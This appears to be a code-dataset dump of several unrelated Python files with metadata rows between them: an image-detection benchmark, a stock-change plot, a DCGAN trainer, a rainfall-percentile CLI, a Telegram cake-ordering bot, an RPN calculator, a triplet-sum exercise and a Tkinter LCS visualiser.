# TODO: det_benchmark and cnts_benchmark should probably be the
# the same function, just confused about which function should return what.
def det_benchmark(img_src, img_lab, detector=V1):
    '''Calculate detection recall and precision for a full detector pipeline.

    *img_src* is the raw image fed to the detector; *img_lab* is the matching
    label image using pure red (0, 0, 255) dots for ground truth.  The label
    image is resized to the detector's output width so the coordinate frames
    align.  The centre of each dot is found via image moments and tested
    against the filled rectangle of every detected ROI.
    '''
    img_res, ROIs = detector(img_src)
    img_res_width = img_res.shape[1]
    img_lab = cv.imread(img_lab, 1)
    # Match the label image to the detector's working resolution.
    img_lab = resize_img(img_lab, img_res_width)
    img_lab = cv.cvtColor(img_lab, cv.COLOR_RGB2BGR)
    _, thresh1 = cv.threshold(img_lab, 50, 255, cv.THRESH_BINARY_INV)
    # Red dots survive in the red plane but not in blue; r-b isolates them.
    b, _, r = cv.split(thresh1)
    dots = r-b
    t_cnts = find_extContours(dots)
    targets = []
    for i, cnt in enumerate(t_cnts):
        # Dot centroid from first-order image moments.
        M = cv.moments(cnt)
        cx, cy = int(M['m10']/M['m00']), int(M['m01']/M['m00'])
        targets.append((i, (cx, cy)))
    det_cnts = []
    for i, (tl, br) in enumerate(ROIs):
        # Draw each ROI as a filled rectangle (-1) on a blank canvas and
        # re-extract it as a contour for pointPolygonTest below.
        canvas = np.zeros(img_res.shape[0:2], np.uint8)
        cv.rectangle(canvas, tuple(tl), tuple(br), 255, -1)
        contours = find_extContours(canvas)
        det_cnts.append((i, contours[0]))
    matches = []
    for det_id, roi_cnt in det_cnts:
        for target_id, center in targets:
            # pointPolygonTest returns 1 when the point lies inside the contour.
            result = cv.pointPolygonTest(roi_cnt, center, False)
            if result == 1:
                matches.append((det_id, target_id))
    tot_matches = len(matches)
    # Unique ground-truth dots hit at least once.
    un_matches = len(set([tup[1] for tup in matches]))
    tot_targets = len(targets)
    tot_cnts = len(det_cnts)
    recall = un_matches/len(targets)*100 if tot_matches else 0
    precision = un_matches/len(det_cnts)*100 if det_cnts else 0
    results = {
        'recall': recall,
        'precision': precision,
        'tot_matches': tot_matches,
        'un_matches': un_matches,
        'tot_targets': tot_targets,
        'tot_cnts': tot_cnts
    }
    return results
if __name__ == "__main__":
    # img_src = 'biodiv/tests/test_images/cats1.jp2'
    # img_lab = 'biodiv/tests/test_images/cats1_bw_lab.jp2'
    img_src = 'biodiv/tests/test_images/but1.jp2'
    img_lab = 'biodiv/tests/test_images/but1_lab.jp2'
    # Run the full-pipeline benchmark on the bundled test image pair.
    print(det_benchmark(img_src, img_lab))
| true |
022455d0d878447121891d95e4ec3759465d4089 | Python | swjee/40.stock_python | /삼성전자주가일간변동률.py | UTF-8 | 523 | 2.515625 | 3 | [] | no_license |
from pandas_datareader import data as pdr
import yfinance as yf
yf.pdr_override()

# Samsung Electronics (KRX: 005930) daily prices since 2018-05-04.
sec = pdr.get_data_yahoo('005930.KS', start='2018-05-04')
# Daily percent change of the close; the first row has no predecessor.
sec_dpc = (sec['Close'] / sec['Close'].shift(1) - 1) * 100
sec_dpc.iloc[0] = 0

from pandas.plotting import register_matplotlib_converters
register_matplotlib_converters()
import matplotlib.pyplot as plt

# Line plot of the daily percent change series.
plt.plot(sec_dpc, 'b', label='Samsung Electronics DPC')
plt.legend(loc='best')
plt.show()

# -- histogram of the daily changes.  (The original had a bare string
# literal here — a no-op expression statement; a comment states the intent.)
plt.hist(sec_dpc, bins=20)
plt.grid(True)
plt.show()
| true |
1d21c5ab88d90edab146f0dc98b4c73bd50b3abb | Python | tiendatnguyen-vision/Final_project_CS570 | /DCGAN_train.py | UTF-8 | 12,368 | 2.609375 | 3 | [] | no_license | # taken from https://github.com/hypojorik/Machine_Learning/blob/310c7d6374093f3238cdc476c05a1d56f29fb161/research_data_generation/DCGAN.py
import numpy as np
import os
import matplotlib.pyplot as plt
import cv2
from numpy.random import choice
from numpy import load
import warnings
warnings.filterwarnings('ignore')
import sys, os, glob, time, imageio
from numpy import asarray
from numpy import savez_compressed
from keras import models, layers, optimizers
IMG_SIZE = 128
# Time
def _time(start, end):
# if in seconds
if (end-start)<60:
wall_time = f'{round((end-start),2)}sec'
# if in minute(s)
elif (end-start)>=3600:
wall_time = f'{int((end-start)/3600)}h {int(((end-start)%3600)/60)}min {round((end-start)%60,2)}sec'
# if in houre(s)
else:
wall_time = f'{int((end-start)/60)}min {round((end-start)%60,2)}sec'
return wall_time
def list_images(basePath, contains=None):
    """Yield every image file (jpg/jpeg/png/bmp) found under *basePath*."""
    image_exts = (".jpg", ".jpeg", ".png", ".bmp")
    return list_files(basePath, validExts=image_exts, contains=contains)
def list_files(basePath, validExts=(".jpg", ".jpeg", ".png", ".bmp"), contains=None):
    """Yield paths (spaces backslash-escaped) of files under *basePath*
    whose extension matches *validExts*.

    If *contains* is given, only filenames containing that substring
    are yielded.
    """
    for (rootDir, dirNames, filenames) in os.walk(basePath):
        for filename in filenames:
            # Optional substring filter on the bare filename.
            if contains is not None and filename.find(contains) == -1:
                continue
            # Extension = text from the last '.' onward, lowercased.
            ext = filename[filename.rfind("."):].lower()
            if ext.endswith(validExts):
                yield os.path.join(rootDir, filename).replace(" ", "\\ ")
def load_images(directory='', size=(128, 128)):
    """Load every image found under *directory* as an RGB array resized to *size*.

    Paths containing 'OSX' are skipped (macOS metadata artifacts).
    Returns a list of numpy arrays in RGB channel order.
    """
    # The original kept unused `labels`/`label` locals and materialized the
    # path generator into a list for no reason; both removed.
    images = []
    for path in list_images(directory):
        if 'OSX' in path:
            continue
        path = path.replace('\\', '/')
        image = cv2.imread(path)        # OpenCV reads in BGR order
        image = cv2.resize(image, size)  # normalize dimensions
        images.append(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
    return images
X_normal= np.array(load_images('Pneumonia_NORMAL',size=(IMG_SIZE, IMG_SIZE))) # to specify the target size of image
# Scale pixel values from [0, 255] to [-1, 1] (matches the generator's tanh output range).
X_normal = (X_normal.astype(np.float32) - 127.5) / 127.5
# Number of training epochs
n_epoch = 500
# Batch size during training
batch_size = 128
# Size of z latent vector (i.e. size of generator input)
latent_dim = 100
# Spatial size of training images. All images will be resized to this size
# Number of channels in the training images. For RGB color images this is 3
channels = 3
in_shape = (IMG_SIZE, IMG_SIZE, channels) # height, width, color
# Beta1 hyperparam for Adam optimizers
beta1 = 0.5
# plot ncols images in row and nrows images in colomn
nrows, ncols = 3, 4
def define_discriminator(in_shape=(128, 128, 3)):
    """Build and compile the DCGAN discriminator: 128x128x3 image -> real/fake score."""
    model = models.Sequential()
    # normal
    model.add(layers.Conv2D(64, (5, 5), padding='same', input_shape=in_shape))
    model.add(layers.LeakyReLU(alpha=0.2))
    # downsample to 64x64
    model.add(layers.Conv2D(128, (5, 5), strides=(2, 2), padding='same'))
    model.add(layers.LeakyReLU(alpha=0.2))
    # downsample to 32x32
    model.add(layers.Conv2D(256, (5, 5), strides=(2, 2), padding='same'))
    model.add(layers.LeakyReLU(alpha=0.2))
    # downsample to 16x16
    model.add(layers.Conv2D(512, (5, 5), strides=(2, 2), padding='same'))
    model.add(layers.LeakyReLU(alpha=0.2))
    # downsample to 8x8
    model.add(layers.Conv2D(1024, (5, 5), strides=(2, 2), padding='same'))
    model.add(layers.LeakyReLU(alpha=0.2))
    # classifier
    model.add(layers.Flatten())
    model.add(layers.Dropout(0.4))
    model.add(layers.Dense(1, activation='sigmoid'))
    # compile model
    # NOTE(review): `lr=` is the legacy Keras spelling (newer versions use
    # `learning_rate=`) — confirm against the pinned Keras version.
    opt = optimizers.Adam(lr=0.00002, beta_1=0.5)
    model.compile(loss='binary_crossentropy', optimizer=opt, metrics=['accuracy'])
    return model
def define_generator(latent_dim):
    """Build (without compiling) the DCGAN generator: latent vector -> 128x128x3 image in [-1, 1]."""
    model = models.Sequential()
    # foundation for 8x8 feature maps
    n_nodes = 1024 * 8 * 8
    model.add(layers.Dense(n_nodes, input_dim=latent_dim))
    model.add(layers.LeakyReLU(alpha=0.2))
    model.add(layers.Reshape((8, 8, 1024)))
    # upsample to 16x16
    model.add(layers.Conv2DTranspose(512, (4, 4), strides=(2, 2), padding='same'))
    model.add(layers.LeakyReLU(alpha=0.2))
    # upsample to 32x32
    model.add(layers.Conv2DTranspose(256, (4, 4), strides=(2, 2), padding='same'))
    model.add(layers.LeakyReLU(alpha=0.2))
    # upsample to 64x64
    model.add(layers.Conv2DTranspose(128, (4, 4), strides=(2, 2), padding='same'))
    model.add(layers.LeakyReLU(alpha=0.2))
    # upsample to 128x128
    model.add(layers.Conv2DTranspose(64, (4, 4), strides=(2, 2), padding='same'))
    model.add(layers.LeakyReLU(alpha=0.2))
    # output layer 128x128x3; tanh keeps pixels in [-1, 1] to match the scaled data
    model.add(layers.Conv2D(3, (5, 5), activation='tanh', padding='same'))
    return model
# input of G
def generate_latent_points(latent_dim, n_samples):
    """Draw *n_samples* random latent vectors of length *latent_dim*.

    Returns an (n_samples, latent_dim) array of standard-normal values.
    """
    flat = np.random.randn(latent_dim * n_samples)
    return flat.reshape(n_samples, latent_dim)
# use the generator to generate n fake examples, with class labels
def generate_fake_samples(g_model, latent_dim, n_samples):
    """Use the generator to produce *n_samples* fake images, labelled 0 ('fake')."""
    latent_batch = generate_latent_points(latent_dim, n_samples)
    images = g_model.predict(latent_batch)
    labels = np.zeros((n_samples, 1))
    return images, labels
def define_gan(g_model, d_model):
    """Stack generator -> discriminator into one compiled model for training the generator.

    Freezes the discriminator so only the generator's weights update when
    this combined model is trained.
    """
    # make weights in the discriminator not trainable
    d_model.trainable = False
    # connect them
    model = models.Sequential()
    # add generator
    model.add(g_model)
    # add the discriminator
    model.add(d_model)
    # compile model
    opt = optimizers.Adam(lr=0.0001, beta_1=0.5)
    model.compile(loss='binary_crossentropy', optimizer=opt)
    return model
# retrive real samples
def get_real_samples(dataset, n_samples):
    """Pick *n_samples* random rows from *dataset*, labelled 1 ('real').

    Sampling is with replacement (independent random indices).
    """
    idx = np.random.randint(0, dataset.shape[0], n_samples)
    samples = dataset[idx]
    labels = np.ones((n_samples, 1))
    return samples, labels
# create and save a plot of generated images
def show_generated(img_save_dir, generated, epoch, nrows=4, ncols=5):
    """Save a nrows x ncols grid of generated images to *img_save_dir* for this epoch."""
    # [-1,1] -> [0,1]
    generated = (generated + 1) / 2
    # generated = (generated[:ncols*nrows]*127.5)+127.5
    # generated = generated*255
    plt.figure(figsize=(10, 10))
    for idx in range(nrows * ncols):
        plt.subplot(nrows, ncols, idx + 1)
        plt.imshow(generated[idx])
        plt.axis('off')
    # epoch is 0-based internally; filenames are 1-based
    plt.savefig(os.path.join(img_save_dir, 'image_at_epoch_{:04d}.png').format(epoch + 1) )
    #plt.show()
# evaluate the discriminator and plot generated images
def summarize_performance(epoch, g_model, d_model, dataset, latent_dim, n_samples=100):
    """Report discriminator accuracy on real vs. fake samples and checkpoint the generator."""
    # prepare real samples
    X_real, y_real = get_real_samples(dataset, n_samples)
    # evaluate discriminator on real examples
    _, acc_real = d_model.evaluate(X_real, y_real, verbose=0)
    # prepare fake examples
    x_fake, y_fake = generate_fake_samples(g_model, latent_dim, n_samples)
    # evaluate discriminator on fake examples
    _, acc_fake = d_model.evaluate(x_fake, y_fake, verbose=0)
    # summarize discriminator performance
    print('> Accuracy at epoch %d [real: %.0f%%, fake: %.0f%%]' % (epoch + 1, acc_real * 100, acc_fake * 100))
    # show plot
    # save the generator model tile file
    # NOTE(review): assumes a 'model/' directory already exists — confirm.
    filename = 'model/generator_model_%03d.h5' % (epoch + 1)
    g_model.save(filename)
def plot_history_loss(dict_his, save_dir, epoch):
    """Plot per-iteration D/G loss curves and save the figure under *save_dir*."""
    plt.figure(figsize=(10, 5))
    plt.title("Loss history During Training", fontsize=20)
    plt.plot(dict_his["D_real_loss"], label="D_real_loss")
    plt.plot(dict_his["D_fake_loss"], label="D_fake_loss")
    plt.plot(dict_his["D_G_loss"], label="G_loss")
    plt.xlabel("Iteration", fontsize=20)
    plt.ylabel("Loss", fontsize=20)
    plt.legend()
    #plt.show()
    plt.savefig(os.path.join(save_dir, 'loss_until_epoch_{:04d}.png').format(epoch + 1))
def plot_history_acc(dict_his, save_dir, epoch):
    """Plot per-iteration discriminator accuracy curves and save the figure under *save_dir*."""
    plt.figure(figsize=(10, 5))
    plt.title("Acc history During Training", fontsize=20)
    plt.plot(dict_his["D_real_acc"], label="D_real")
    plt.plot(dict_his["D_fake_acc"], label="D_fake")
    plt.xlabel("Iteration", fontsize=20)
    plt.ylabel("Acc", fontsize=20)
    plt.legend()
    #plt.show()
    plt.savefig(os.path.join(save_dir, 'acc_until_epoch_{:04d}.png').format(epoch + 1))
def train(g_model, d_model, gan_model, dataset, latent_dim=100, n_epochs=500, n_batch=128, save_model_interval=20, save_img_interval=10, history_interval = 5):
    """Run the DCGAN training loop.

    Alternates discriminator updates (half real / half fake batches) with
    generator updates through the frozen-discriminator GAN model.  Images,
    generator weights and loss/accuracy plots are periodically saved under a
    fresh numbered subdirectory of 'save_DCGAN/'.
    """
    # Create save_DCGAN/<n>/ with image/, weight/ and history/ subfolders;
    # <n> is one past the number of existing runs.
    subs = os.listdir("save_DCGAN")
    new_subdir = os.path.join("save_DCGAN", str(len(subs) + 1))
    os.makedirs(new_subdir, exist_ok=False)
    new_img_dir = os.path.join(new_subdir, "image")
    new_weight_dir = os.path.join(new_subdir, "weight")
    new_history_dir = os.path.join(new_subdir, "history")
    os.makedirs(new_img_dir)
    os.makedirs(new_weight_dir)
    os.makedirs(new_history_dir)
    start = time.time()
    bat_per_epo = int(dataset.shape[0] / n_batch)
    half_batch = int(n_batch / 2)
    dict_loss = {"D_real_loss": [], "D_fake_loss": [], "D_G_loss": []}
    dict_acc = {"D_real_acc": [], "D_fake_acc": []}
    # manually enumerate epochs
    print('Training Start...')
    for i in range(n_epochs):
        start1 = time.time()
        # enumerate batches over the training set
        for j in range(bat_per_epo):
            # get randomly selected 'real' samples
            X_real, y_real = get_real_samples(dataset, half_batch)
            # update discriminator model weights
            d_loss1, d_acc1 = d_model.train_on_batch(X_real, y_real)
            # generate 'fake' examples
            X_fake, y_fake = generate_fake_samples(g_model, latent_dim, half_batch)
            # update discriminator model weights
            d_loss2, d_acc2 = d_model.train_on_batch(X_fake, y_fake)
            # prepare points in latent space as input for the generator
            X_gan = generate_latent_points(latent_dim, n_batch)
            # create inverted labels for the fake samples
            y_gan = np.ones((n_batch, 1))
            # update the generator via the discriminator's error
            g_loss = gan_model.train_on_batch(X_gan, y_gan)
            # summarize loss on this batch
            dict_loss["D_real_loss"].append(d_loss1)
            dict_loss["D_fake_loss"].append(d_loss2)
            dict_loss["D_G_loss"].append(g_loss)
            dict_acc["D_real_acc"].append(d_acc1)
            dict_acc["D_fake_acc"].append(d_acc2)
        # per-epoch progress line (reports the last batch's losses)
        print('Epoch: {:03d}/{:03d}, Loss: [D_loss_real = {:2.3f}, D_loss_fake = {:2.3f}, G = {:2.3f}], time: {:s}' \
              .format(i + 1, n_epochs, d_loss1, d_loss2, g_loss, _time(start1, time.time())))
        if (i+1) % save_img_interval == 0:
            x_fake, y_fake = generate_fake_samples(g_model, latent_dim, 100)
            show_generated(new_img_dir,generated=x_fake, epoch=i)
        if (i+1) % save_model_interval == 0:
            filename = os.path.join(new_weight_dir, 'generator_model_%03d.h5' % (i + 1))
            g_model.save(filename)
        if (i+1) % history_interval == 0:
            plot_history_loss(dict_loss, save_dir=new_history_dir, epoch=i)
            plot_history_acc(dict_acc, save_dir=new_history_dir, epoch=i)
    print('Total time for training {} epochs is {} sec'.format(n_epochs, _time(start, time.time())))
# Build the three models and launch training on the normalized X-ray dataset.
discriminator = define_discriminator()
generator = define_generator(latent_dim)
# create the gan
gan = define_gan(generator, discriminator)
# train model
train(generator, discriminator, gan, X_normal, latent_dim, n_epochs=n_epoch, n_batch=batch_size,save_model_interval=20, save_img_interval=5)
| true |
95ef517110d5bd90937bb7b94b7d19b294c1d0b6 | Python | KitchenTable99/Kenya-Rainfall | /create_rainfall_data.py | UTF-8 | 2,838 | 2.84375 | 3 | [] | no_license | # This file will run all the scripts needed to create a finalied .csv file containing %-ile rainfall data
# Caleb Bitting (Colby Class of 2023)
# Written for research for Professor Daniel LaFave at Colby College
#
import os
import argparse
import itertools
import numpy as np
import pandas as pd
import csv_polishing
import rainfall_sums
import gamma_calculations
def commandLineParser():
    '''Parse this tool's command line arguments.

    Returns:
        argparse.Namespace: the parsed command line arguments
    '''
    arg_parser = argparse.ArgumentParser()
    add = arg_parser.add_argument
    add('--unit_code', required=True, type=int, help='the unit code that designates the area of interest. See ./resources/unit_name.txt for list of unit codes.')
    add('--distance', required=True, type=float, default=10., help='the maximum distance (in km) allowed between a DHS center and a precip grid center.')
    add('--shapefile_path', required=True, type=str, help='the path to the .shp file in a shapefile folder. This folder should be expanded from a .zip file.')
    add('--len_years', required=True, type=int, help='the number of years to use to fit each gamma distribution.')
    add('--output_file', type=str, default='cleanGamma_data.csv', help='the name of the processed csv. Defaults to cleanGamma_data.csv')
    add('--windows', '-w', type=str, help='the file path for the list of the names of precip files.')
    add('--verbose', '-v', action='store_true', help='whether or not to see the intermediate progress bar')
    add('--testing', '-t', action='store_true', help='enter testing mode. All functions will be passed testing=True where possible.')
    add('--determine_distance', default=False, help='needed for file_parsers. DO NOT TOUCH.')
    return arg_parser.parse_args()
def main():
    """Run the full pipeline: rainfall sums -> gamma percentiles -> polished CSV."""
    # command-line arguments
    cmd_args = commandLineParser()
    # get rainfall sums
    gdf = rainfall_sums.body(cmd_args)
    # eye breathing room
    # NOTE(review): `stty size` requires a real terminal — this will fail
    # when run without a tty (e.g. cron); confirm intended usage.
    _, columns = os.popen('stty size', 'r').read().split()
    fancy_sep = ['-' for _ in range(int(columns))]
    print(''.join(fancy_sep))
    # get percentile data
    rainfall_list = gdf['Rainfall Totals'].tolist()
    percentiles = gamma_calculations.body(rainfall_list, cmd_args)
    # edit csv
    year = 1950 + cmd_args.len_years
    df = csv_polishing.body(rainfall_list, percentiles, year)
    # get DHSID: repeat each DHS id once per percentile column so rows align
    DHSID_col = gdf['DHSID'].repeat(len(percentiles[0]))
    DHSID_col = DHSID_col.reset_index(drop=True)
    df.insert(0, 'DHSID', DHSID_col, allow_duplicates=True)
    df.drop('Location', axis=1, inplace=True)
    # output
    df.to_csv(cmd_args.output_file, index=False)
if __name__ == '__main__':
    main()
35e57248efa242623a600a5c5e14e4f45ca7ddb2 | Python | c-Door-in/BakeCakeBot | /bot.py | UTF-8 | 2,716 | 2.53125 | 3 | [] | no_license | import logging
from environs import Env
from telegram import ReplyKeyboardMarkup, ReplyKeyboardRemove
from telegram.ext import (
Updater,
Filters,
CommandHandler,
MessageHandler,
)
# Module-level logging: timestamped INFO messages for the bot's handlers.
logging.basicConfig(
    format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
    level=logging.INFO
)
logger = logging.getLogger(__name__)
def start(update, _):
    """Handle /start: send the personal-data PDF and ask the user to accept or decline."""
    reply_keyboard = [['Принять', 'Отклонить']]
    with open('personal_data.pdf', 'rb') as pd_file:
        update.message.reply_document(pd_file)
    update.message.reply_text(
        'Подтвердите солгасие на обработку персональных данных',
        reply_markup=ReplyKeyboardMarkup(reply_keyboard)
    )
def accept(update, _):
    """Handle consent acceptance: prompt the user for a contact phone number."""
    reply_keyboard = [['Введите контактный номер телефона']]
    update.message.reply_text(
        'Изготовление тортов на заказ.',
        reply_markup=ReplyKeyboardMarkup(
            reply_keyboard,
            input_field_placeholder='+7-999-9999',
        )
    )
def phone(update, _):
    """Handle a message matching the phone-number regex: register the user and continue."""
    reply_keyboard = [['Собрать торт']]
    user = update.message.from_user
    phone_number = update.message.text
    # log the user/phone pairing for registration records
    logger.info('Match %s with %s', user, phone_number)
    update.message.reply_text('Вы успешно зарегистрированы!')
    update.message.reply_text(
        'Выберите ингредиенты, форму, основу, надпись, '
        'а мы привезем готовый торт к вашему празднику.',
        reply_markup=ReplyKeyboardMarkup(reply_keyboard),
    )
def cancel(update, _):
    """Cancels and ends the conversation."""
    user = update.message.from_user
    logger.info("User %s canceled the conversation.", user.first_name)
    update.message.reply_text(
        'Всего доброго!',
        # remove the custom keyboard so the chat returns to normal input
        reply_markup=ReplyKeyboardRemove(),
    )
def main():
    """Wire up the handlers and start the bot's long-polling loop."""
    env = Env()
    env.read_env()
    updater = Updater(token=env('TG_BOT_TOKEN'))
    dispatcher = updater.dispatcher
    start_handler = CommandHandler('start', start)
    accept_handler = MessageHandler(Filters.regex('Принять'), accept)
    # Raw string for the phone regex: '\+' and '\d' inside a normal string
    # literal are invalid escape sequences (DeprecationWarning today, a
    # SyntaxError in future Python versions).  The pattern itself is unchanged.
    phone_handler = MessageHandler(Filters.regex(r'^\+?\d{1,3}?( |-)?\d{3}( |-)?\d{3}( |-)?\d{2}( |-)?\d{2}$'), phone)
    cancel_handler = MessageHandler(Filters.text('Отклонить'), cancel)
    dispatcher.add_handler(start_handler)
    dispatcher.add_handler(accept_handler)
    dispatcher.add_handler(phone_handler)
    dispatcher.add_handler(cancel_handler)
    updater.start_polling()
    updater.idle()
if __name__ == '__main__':
main() | true |
f45aeea148bf173c9cd40a985c7eee5dea477603 | Python | Retried/WRP | /Python_simple/Kalkulator RPN (2).py | UTF-8 | 1,509 | 3.953125 | 4 | [] | no_license | stack = []
def evaluate_plus(stack):
a = stack.pop()
b = stack.pop()
stack.append(a + b)
pass
def evaluate_minus(stack):
a = stack.pop()
b = stack.pop()
stack.append(b - a)
pass
def evaluate_multiply(stack):
a = stack.pop()
b = stack.pop()
stack.append(a * b)
pass
def evaluate_divide(stack):
a = stack.pop()
b = stack.pop()
stack.append(b / a)
pass
def evaluate_integer(expr, stack):
stack.append(int(expr))
# Dispatch table: RPN token -> handler that mutates the operand stack.
operators = {
    "+": evaluate_plus,
    "-": evaluate_minus,
    "*": evaluate_multiply,
    "/": evaluate_divide,
    "p": lambda stack: print(stack[-1])  # 'p' prints the top of the stack without popping
}
def evaluate_expression(expr, stack):
    """Evaluate one line of RPN tokens against *stack*.

    Each token is either an integer (pushed) or a key in the module-level
    ``operators`` dispatch table.  Always returns None — the caller's
    ``if done: break`` therefore never fires.

    The original carried a large commented-out if/elif chain duplicating the
    dispatch table (plus a dead ``pass``); both removed.
    """
    for token in expr:
        try:
            evaluate_integer(token, stack)
        except ValueError:
            # not a number -> dispatch to the operator handler
            operators[token](stack)
# Read-eval loop: one line of whitespace-separated RPN tokens per iteration.
while True:
    expr = input()
    expr = expr.split()
    done = evaluate_expression(expr, stack)
    # NOTE(review): evaluate_expression always returns None, so this break is
    # never taken — the loop only ends when input() raises (e.g. EOFError).
    if done:
        break
| true |
66680ce3719d31905e2f692343f314be15fe3677 | Python | thehayat/DSA | /Array/tripletFamily.py | UTF-8 | 814 | 3.328125 | 3 | [] | no_license | "Question"
# https://practice.geeksforgeeks.org/problems/triplet-family/1/?ref=self
def findTriplet(arr, n=None):
    """Find pairs (a, b) in *arr* whose sum is also an element of *arr*.

    Returns up to three tuples (a, b, a + b), stopping early once three are
    found.  Sorts *arr* in place.

    ``n`` (the declared array length) is unused; it now defaults to None so
    the existing call site that passes only ``arr`` no longer raises
    TypeError, while two-argument callers keep working.
    """
    arr.sort()
    arr_set = set(arr)
    output = []
    for i in range(len(arr)):
        for j in range(i, len(arr)):
            if i != j:
                if arr[i] + arr[j] in arr_set:
                    output.append((arr[i], arr[j], arr[i] + arr[j]))
            # stop once three triplets have been collected
            if len(output) >= 3:
                return output
    return output
if __name__ == '__main__':
    # One test case per pair of lines: the array size, then the elements.
    testcase = int(input())
    for i in range(testcase):
        size = int(input())
        arr = list(map(int, input().strip().split()))
        # Pass the declared size through: the original call dropped it, which
        # raised TypeError against findTriplet's two-argument signature.
        print(findTriplet(arr, size))
d7ffc69e7417223617412f2fd6f1f7907d454218 | Python | AlexisPA19/Analisis-de-algoritmos | /subsecComunMax.py | UTF-8 | 4,784 | 3.15625 | 3 | [] | no_license | from tkinter import ttk
from tkinter import*
class SubsecComMax:
    """Tkinter app that computes and visualizes the Longest Common Subsequence (LCS)
    of two input strings via dynamic programming."""
    # UI definition
    def __init__(self,window):
        self.wind = window
        self.wind.title('Subsecuencia Común Máxima')
        frame = LabelFrame(self.wind)
        frame.grid(row = 0, column = 0, columnspan = 3, pady = 20)
        Label(frame, text = 'Secuencia X:').grid(row = 1, column = 0)
        self.secX = Entry(frame)
        self.secX.grid(row =1, column = 1)
        Label(frame, text = 'Secuencia Y:').grid(row = 2, column = 0)
        self.secY = Entry(frame)
        self.secY.grid(row =2, column = 1)
        ttk.Button(frame,text = 'Calcular', command = self.Subsecuencia).grid(row = 3, column = 1)
    # Dynamic programming
    def Subsecuencia(self):
        """Build the LCS table for the two entries, render it, and list the LCS strings."""
        x = str(self.secX.get())
        y = str(self.secY.get())
        tamx = len(x) + 1
        tamy = len(y) + 1
        self.lenx = len(x)
        self.leny = len(y)
        print("X: {} tam:{}".format(x,len(x)))
        print("Y: {} tam:{}".format(y,len(y)))
        self.tabla = []
        # Create the DP table: each cell is (length, move) where move is
        # "D" diagonal (match), "S" up, or "I" left.
        for i in range(tamy):
            self.tabla.append([])
            for j in range(tamx):
                self.tabla[i].append((0,None))
        for i in range(tamy):
            self.tabla[i][0] = tuple((0," "))
        for i in range(tamx):
            self.tabla[0][i] = tuple((0," "))
        # Fill the DP table (classic LCS recurrence)
        for i in range(1,tamy):
            for j in range(1,tamx):
                if y[i-1] == x[j-1] :
                    self.tabla[i][j] = tuple((self.tabla[i -1][j-1][0] + 1,"D"))
                elif self.tabla[i-1][j][0] >= self.tabla[i][j-1][0]:
                    self.tabla[i][j] = tuple((self.tabla[i-1][j][0],"S"))
                else:
                    self.tabla[i][j]= tuple((self.tabla[i][j-1][0],"I"))
        for i in range(tamy):
            for j in range(tamx):
                print("{}".format(self.tabla[i][j]),end=" ")
            print("\n")
        # Build the on-screen table of Labels mirroring the DP table
        frame2 = LabelFrame(self.wind, text = 'Tabla de seguimiento')
        frame2.grid(row = 4, column = 0)
        self.table = []
        for i in range(tamy+1):
            self.table.append([])
            for j in range(tamx+1):
                self.table[i].append(Label(frame2,font="arial36",bg="#EEE0DE",relief="ridge",pady=7,padx=8,text=" \n"))
                self.table[i][j].grid(row = i, column = j)
        for i in range(2,tamy+1):
            self.table[i][0].config(text=y[i-2]+"\n",bg="gray")
        for i in range(2,tamx+1):
            self.table[0][i].config(text=x[i-2]+"\n",bg="gray")
        for i in range(1,tamy+1):
            self.table[i][1].config(text="0\n")
        for i in range(1,tamx+1):
            self.table[1][i].config(text="0\n")
        for i in range(2,tamy+1):
            for j in range(2,tamx+1):
                self.table[i][j].config(text="{}\n{}".format(self.tabla[i-1][j-1][0],self.tabla[i-1][j-1][1]))
        # Collect starting cells for traceback: the bottom-right corner plus
        # every diagonal cell that already reached the maximum LCS length.
        len_max = int(self.tabla[tamy-1][tamx-1][0])
        list_sus_max =[]
        list_sus_max.append((tamy-1,tamx-1))
        for i in range(tamy):
            for j in range(tamx):
                if self.tabla[i][j][0]==len_max and self.tabla[i][j][1]=='D' and j != tamx-1:
                    list_sus_max.append((i,j))
        print("Caminos posibles:{}".format(list_sus_max))
        # Reconstruct each LCS string, highlighting its path in a distinct color
        self.sol=""
        frame3 = Frame(self.wind)
        frame3.grid(row = 5, column = 0)
        for i in range(len(list_sus_max)):
            self.sol=""
            color = "#{1}5{0}826".format((i+2*i*3)%9,(i+2*i*8+16)%9)
            self.Escribir(self.tabla,y,list_sus_max[i][0],list_sus_max[i][1],color)
            Label(frame3, text = 'Subsecuencia común máxima : {}'.format(self.sol)).grid(row = i+1, column = 0)
            print("Subsecuencia común máxima: {}".format(self.sol))
    # Recursive traceback
    def Escribir(self,tabla,y,i,j,color):
        """Walk back through the DP table from (i, j), accumulating the LCS into
        self.sol and coloring the visited UI cells."""
        if i == 0 or j == 0:
            self.sol=""
        elif tabla[i][j][1] == 'D':
            self.Escribir(tabla,y,i-1,j-1,color)
            self.sol = self.sol + y[i-1]
            self.table[i+1][j+1].configure(bg="{}".format(color))
        elif tabla[i][j][1] == 'S':
            self.Escribir(tabla,y,i - 1,j,color)
            self.table[i+1][j+1].configure(bg="{}".format(color))
        else:
            self.Escribir(tabla,y,i,j - 1,color)
            self.table[i+1][j+1].configure(bg="{}".format(color))
if __name__ == '__main__':
    # Build the Tk root window, attach the app, and enter the event loop.
    window = Tk()
    application = SubsecComMax(window)
    window.mainloop()
4f7a6a00ed365bb41f83ec6ba3292d73aa677c1a | Python | demokn/mcan | /mcan/console.py | UTF-8 | 6,694 | 2.515625 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
MCan.
Cli tools for meican app.
Copyright (C) 2017 demokn <https://github.com/demokn/mcan>
Usage:
mcan [option] [-c PATH] [-u USER] [-p PASSWD] [--appid=APPID] [--appsecret=APPSECRET] [--favourite=FAVOURITE] [--debug]
mcan (-h | --help)
mcan --version
Options:
-h --help Show this screen.
-c PATH --config=PATH Specifies the config file path.
-u USER --user=USER Specifies the meican user.
-p PASSWD --password=PASSWD Specifies the meican password.
--appid=APPID Specifies the meican client_id.
--appsecret=APPSECRET Specifies the meican client_secret.
--favourite=FAVOURITE Specifies your favourite dishes.
--debug Open debug mode.
--version Show version.
See https://github.com/demokn/mcan for more information.
"""
from docopt import docopt
from datetime import date
from random import randint
import logging
try:
import json
except ImportError:
import simplejson as json
from . import __version__
from .core import McanApp
from .config import McanConf
# Module-level logger: bare messages (no timestamps) to the console at INFO level.
logger = logging.getLogger(__name__)
sh = logging.StreamHandler()
fmt = logging.Formatter('%(message)s')
sh.setFormatter(fmt)
logger.setLevel(logging.INFO)
logger.addHandler(sh)
class ConsoleFormat:
    """ANSI escape-code helpers for colored terminal output."""

    BLACK = '\033[30m'
